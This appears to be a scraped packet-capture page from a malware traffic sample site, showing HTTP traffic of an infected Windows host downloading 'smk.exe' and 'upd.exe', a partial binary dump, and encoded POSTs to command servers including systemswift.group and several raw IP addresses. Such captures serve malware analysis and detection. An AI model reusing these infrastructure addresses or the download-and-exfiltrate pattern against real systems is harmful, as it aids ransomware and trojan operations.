.e……….h(P….P..HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Sep 2019 17:33:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding

e
173.66.146.112
0

2019-09-18 13:33:31.096777 IP 189.129.4.186.80 > 10.9.18.101.49164: Flags [P.], seq 2600252:2600556, ack 1832, win 64240, length 304: HTTP: HTTP/1.1 200 OK
E..X]……p….
.e.P….^.r.!.P…….HTTP/1.1 200 OK
Server: nginx
Date: Wed, 18 Sep 2019 17:33:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 148
Connection: keep-alive

2019-09-18 13:33:35.224641 IP 10.9.18.101.49184 > 66.228.32.31.443: Flags [P.], seq 497095651:497096370, ack 1689891519, win 64240, length 719
E…..@…k.
.eB. .. ……d…P….x..POST /arizona/forced/sess/merge/ HTTP/1.1
Referer: http://66.228.32.31/arizona/forced/sess/merge/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 66.228.32.31:443
Content-Length: 274
Connection: Keep-Alive
Cache-Control: no-cache

Gr2qPfZCOq0zLdd=i7eSuPXcauG6h3x4nXsddr2HLhaseSX3P3dp7S4gBcKhcmoqkbf7HcBzb%2Brohq%2FeEkR%2BTnIjMI8V8T%2BAxqF%2FTEK2DhDrGASZbhUbLTPbf1upgbttXYNLrhthHlz4c5qcEHunBZWx0TLZ6Jd6XQvpghjIetcPXLPTuULc9957VIe9PeppR6pU9rDnk2VG%2Fw1PflceQ%2Fw59Gx%2BnGblT3orLZBUGOgmdwfAYGBjYe%2BuZLDzlb1T

smk.exe systemswift.group Ransomware Malware Trojan Download PCAP file Download Traffic Sample

2019-05-30 00:27:40.790210 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3141076432:3141076852, ack 132281672, win 16425, length 420: HTTP: GET /smk.exe HTTP/1.1
E…..@…..
.
.
.
.. .P.9….uHP.@)D…GET /smk.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:27:41.270451 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 91981:92976, ack 420, win 237, length 995: HTTP
E…..@.@.DX
.
.
.
..P. …..9.tP…+……………………………………………………………………………………………………………………………………………………………………………………………….
……………………………………………………………………………………………………………………………………………………………………………………………………………….
………………………………………………………………………………………………………………P.,…….00………… ………………..h……….. .. …. …. …….00…. ..%………….
…..L.-. .-………….Y.-.(.-………….f.-.<.-………….r.-.D.-…………………~.-…….-…-…-…-…….-…….-…..ADVAPI32.dll.KERNEL32.DLL.MSIMG32.dll.USER32.dll….RegEnumKeyA…ExitProcess…GetProcAddress..Lo adLibraryA..VirtualProtect..AlphaBlend..CreateIcon………………………….. 2019-05-30 00:27:41.471058 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 91981:92976, ack 420, win 237, length 995: HTTP
E…..@.@.DW
.2019-05-30 00:28:45.641573 IP 10.1.10.162.49185 > 10.1.10.224.80: Flags [P.], seq 1442212575:1442212995, ack 1861255134, win 16425, length 420: HTTP: GET /upd.exe HTTP/1.1
E…..@…..
.
.
.
..!.PU.j.n…P.@)….GET /upd.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:31:43.342932 IP 10.1.10.162.49188 > 87.251.88.11.80: Flags [P.], seq 3366683940:3366684106, ack 1501580209, win 16425, length 166: HTTP: POST /index.php HTTP/1.1
E….1@…-P
.
.W.X..$.P…$Y.K.P.@)….POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: systemswift.group
Content-Length: 43647
Cache-Control: no-cache

2019-05-30 00:31:43.903892 IP 10.1.10.162.49188 > 87.251.88.11.80: Flags [P.], seq 42506:43813, ack 1, win 16425, length 1307: HTTP
E..C.V@…(.
.
.W.X..$.P..+.Y.K.P.@)H…|.[0.m}.*u.S..#u.#u.#u.#..6a.#u.#g.6f.K/. ..Vu.l .wo.2X.D0.Q..9u.3a...j1.lu.m3...w4.g4.gu.D..D’.s=.&.B1.s!.qX.Q..G..@=.j;.gu.GX.Q..#..:.f’.N<.q:.#..j#.qX.Q..#..e9.!.qu.j&.o4.#..j#.qX.._. X.X..p!.nu.q:.f&.^X. ..p!.nX. \.n&.-0.fX.&.p&.f-...j;.m<.-0.fX. &.q#.0.-0.fX. \.u6.l&.-0.fX. \.g9.k:.w{.{0. \. 1.o=.p!.f-.._. &.=.p!.f-... &.=.p!.f-.._. &.=.p!.f-... .t8.f-... &.=.p!.f-.._. &.=.p!.f-... &.=.p!.f-.._. &.l:.p#.f-.._. &.=.p!.f-... &.=.p!.f-.._. &.=.p!.f-... &.=.p!.f-.._. ..b'.k..g0.f'.f-.._. \.f4.=.q:.l6.o..p!.f-... .f4.¨C11C&.p&.f-..¨C19C.G#.U..H’.B..n8.Ke.-0.fX.v%.Xd.-0.fu..¨C20C. ..q:.w9.+m.5{.-g.2m.._.HT..U..U..U..U..(…..U#.U.+U..U..U..u..U..U.A’.t&.q&.@:.h<.p .m!.q;.w..s9.q0.O:.-!.w…W..[..U..U..U.R…U…..U..U..U..T.#U…..U.l:.j0.j&.-!.w…W..[..U..U..U.&..l…:?.U..U..U..T.#U…..U.¨C12C.1c.1..4m.Bf.5d.7..3x.A…f.1b.5a.Gf.Ax.7…a.Gb.;¨C13C.E`.:..1..6f.4b.Ex.1m..a.7d.Bc.2x.2g.5g.3b.6..3c..a.7e.A..1x.Bg.Ec.2..1..6a.Ex.7…m.Ef.Gl.3..2l.2g. 2019-05-30 00:31:44.415010 IP 87.251.88.11.80 > 10.1.10.162.49188: Flags [P.], seq 1:192, ack 43813, win 32, length 191: HTTP: HTTP/1.1 200 OK
E …:@./…W.X.
.
..P.$Y.K…0IP.. .o..HTTP/1.1 200 OK
Server: nginx
Date: Thu, 30 May 2019 04:31:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.6.40